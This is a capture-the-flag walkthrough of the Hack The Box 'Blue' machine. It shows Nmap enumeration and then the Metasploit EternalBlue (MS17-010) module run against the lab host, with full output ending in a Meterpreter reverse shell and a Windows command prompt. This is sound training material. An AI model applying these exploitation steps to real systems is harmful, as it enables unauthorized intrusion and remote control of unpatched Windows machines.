___ ___ _________ ________
|\ \|\ \|\___ ___\\ __ \ ___
\ \ \\\ \|___ \ \_\ \ \|\ /_|\__\
\ \ __ \ \ \ \ \ \ __ \|__|
\ \ \ \ \ \ \ \ \ \ \|\ \ ___
\ \__\ \__\ \ \__\ \ \_______\|\__\
\|__|\|__| \|__| \|_______|\|__|
________ ___ ___ ___ _______
|\ __ \|\ \ |\ \|\ \|\ ___ \
\ \ \|\ /\ \ \ \ \ \\\ \ \ __/|
\ \ __ \ \ \ \ \ \\\ \ \ \_|/__
\ \ \|\ \ \ \____\ \ \\\ \ \ \_|\ \
\ \_______\ \_______\ \_______\ \_______\
\|_______|\|_______|\|_______|\|_______|
Hack The Box's Blue is an Easy machine that features the MS17-010 EternalBlue exploit. This exploit uses a vulnerability in the SMBV1 file-sharing protocol. The EternalBlue exploit goes back to 2017 when the Shadow Brokers hacking group leaked the vulnerability after (supposedly) hacking the NSA. You can read more about its history on WIRED. Once starting the machine on HTB and connecting to your HTB VPN, we will start by opening our terminal and pinging the machine's IP address to make sure the network is up. Make sure the IP address you enter matches the one displayed on HTB when you boot up the target machine.
You should receive responses from the IP address. You can press CTRL + C to stop sending packets to the target host. Once confirming the network is up and running, it's time to move to enumeration using Nmap.
Start by doing a quick service scan using Nmap. We will use the -sV switch to enable version detection scanning on the network's ports. You should receive the following output in your terminal:
nmap -sV 10.129.130.218
Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-22 22:34 GMT
Nmap scan report for 10.129.130.218
Host is up (0.079s latency).
Not shown: 991 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49156/tcp open msrpc Microsoft Windows RPC
49157/tcp open msrpc Microsoft Windows RPC
Service Info: Host: HARIS-PC; OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 61.92 seconds
On port 445 we can see that Windows 7 Professional 7601 Service Pack 1 is running, and it's open. I
suggest using your favorite search engine to always do some research on
services running on open ports and their vulnerabilities. There are
also tools which can scan for vulnerabilities automatically as well. After doing some research, we find this service can be exploited using MS17-010 EternalBlue! While there are ways to manually exploit this service we will be using the easiest method, Metasploit.
Open Metasploit in a new terminal by typing "msfconsole".
msfconsole
_ _
/ \ /\ __ _ __ /_/ __
| |\ / | _____ \ \ ___ _____ | | / \ _ \ \
| | \/| | | ___\ |- -| /\ / __\ | -__/ | || | || | |- -|
|_| | | | _|__ | |_ / -\ __\ \ | | | | \__/| | | |_
|/ |____/ \___\/ /\ \\___/ \/ \__| |_\ \___\
=[ metasploit v6.1.9-dev ]
+ -- --=[ 2169 exploits - 1149 auxiliary - 398 post ]
+ -- --=[ 592 payloads - 45 encoders - 10 nops ]
+ -- --=[ 9 evasion ]
Metasploit tip: View all productivity tips with the
tips command
msf6 >
Metasploit has thousands of exploits available to use. Lets search for the MS17-010 exploit using the "search" option.
msf6 > search MS17-010
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/windows/smb/ms17_010_eternalblue 2017-03-14 average Yes MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
1 exploit/windows/smb/ms17_010_psexec 2017-03-14 normal Yes MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
2 auxiliary/admin/smb/ms17_010_command 2017-03-14 normal No MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
3 auxiliary/scanner/smb/smb_ms17_010 normal No MS17-010 SMB RCE Detection
4 exploit/windows/smb/smb_doublepulsar_rce 2017-04-14 great Yes SMB DOUBLEPULSAR Remote Code Execution
Interact with a module by name or index. For example info 4, use 4 or use exploit/windows/smb/smb_doublepulsar_rce
Metasploit returns a few different options but the exploit we are looking for is the first one, exploit/windows/smb/ms17_010_eternalblue. To use an exploit we can type "use" and then the exploits assigned index # value from the search results.
Once the exploit has loaded, type "options" and hit Enter. This will bring up the exploits options which we will need to configure.
msf6 > use 0
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms17_010_eternalblue) > options
Module options (exploit/windows/smb/ms17_010_eternalblue):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), see https://g
ithub.com/rapid7/metasploit-frame
work/wiki/Using-Metasploit
RPORT 445 yes The target port (TCP)
SMBDomain no (Optional) The Windows domain to
use for authentication. Only affe
cts Windows Server 2008 R2, Windo
ws 7, Windows Embedded Standard 7
target machines.
SMBPass no (Optional) The password for the s
pecified username
SMBUser no (Optional) The username to authen
ticate as
VERIFY_ARCH true yes Check if remote architecture matc
hes exploit Target. Only affects
Windows Server 2008 R2, Windows 7
, Windows Embedded Standard 7 tar
get machines.
VERIFY_TARGET true yes Check if remote OS matches exploi
t Target. Only affects Windows Se
rver 2008 R2, Windows 7, Windows
Embedded Standard 7 target machin
es.
Payload options (windows/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thr
ead, process, none)
LHOST 64.227.23.118 yes The listen address (an interface may b
e specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic Target
msf6 exploit(windows/smb/ms17_010_eternalblue) >
Setting options for an exploit is quite straightforward. When we display our current options, we can see the options name, the current setting, whether the option is required, and a short description of the option. As we can see, our RHOSTS option is blank. To set this we will need to type "set RHOSTS" then the IP of our target machine and hit Enter. We will see a confirmation line with the set RHOSTS IP.
msf6 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 10.129.130.218
RHOSTS => 10.129.130.218
msf6 exploit(windows/smb/ms17_010_eternalblue) >
You can review the updated options at any time by using the "options" command. While looking through the options, we also see an RPORT is required, which is already set to 445, our targets port running the Windows 7 Professional 7601 Service Pack 1 service.
You will also see Payload options which will usually automatically be configured to your machine. In some cases, you may need to set the LHOST IP address to your current listening interface. You can do this by typing "set LHOST" followed by your interface. While using a VPN or the HTB PWNBOX you may need to set this option to "tun0".
With your options set it's time to run the exploit by typing "run" then hitting Enter.
msf6 exploit(windows/smb/ms17_010_eternalblue) > run
[*] Started reverse TCP handler on 10.10.14.90:4444
[*] 10.129.130.218:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 10.129.130.218:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[*] 10.129.130.218:445 - Scanned 1 of 1 hosts (100% complete)
[+] 10.129.130.218:445 - The target is vulnerable.
[*] 10.129.130.218:445 - Connecting to target for exploitation.
[+] 10.129.130.218:445 - Connection established for exploitation.
[+] 10.129.130.218:445 - Target OS selected valid for OS indicated by SMB reply
[*] 10.129.130.218:445 - CORE raw buffer dump (42 bytes)
[*] 10.129.130.218:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73 Windows 7 Profes
[*] 10.129.130.218:445 - 0x00000010 73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76 sional 7601 Serv
[*] 10.129.130.218:445 - 0x00000020 69 63 65 20 50 61 63 6b 20 31 ice Pack 1
[+] 10.129.130.218:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 10.129.130.218:445 - Trying exploit with 12 Groom Allocations.
[*] 10.129.130.218:445 - Sending all but last fragment of exploit packet
[*] 10.129.130.218:445 - Starting non-paged pool grooming
[+] 10.129.130.218:445 - Sending SMBv2 buffers
[+] 10.129.130.218:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 10.129.130.218:445 - Sending final SMBv2 buffers.
[*] 10.129.130.218:445 - Sending last fragment of exploit packet!
[*] 10.129.130.218:445 - Receiving response from exploit packet
[+] 10.129.130.218:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 10.129.130.218:445 - Sending egg to corrupted connection.
[*] 10.129.130.218:445 - Triggering free of corrupted buffer.
[*] Sending stage (200262 bytes) to 10.129.130.218
[*] Meterpreter session 1 opened (10.10.14.90:4444 -> 10.129.130.218:49158) at 2022-03-22 23:47:44 +0000
[+] 10.129.130.218:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.129.130.218:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.129.130.218:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
meterpreter >
We got a Meterpreter session! We can now type "shell" and hit Enter to get a shell on the target system!
meterpreter > shell
Process 2548 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32>
You can now navigate through the target system to obtain the root and user .txt flags which are located within the user and administrator's Desktop folders.
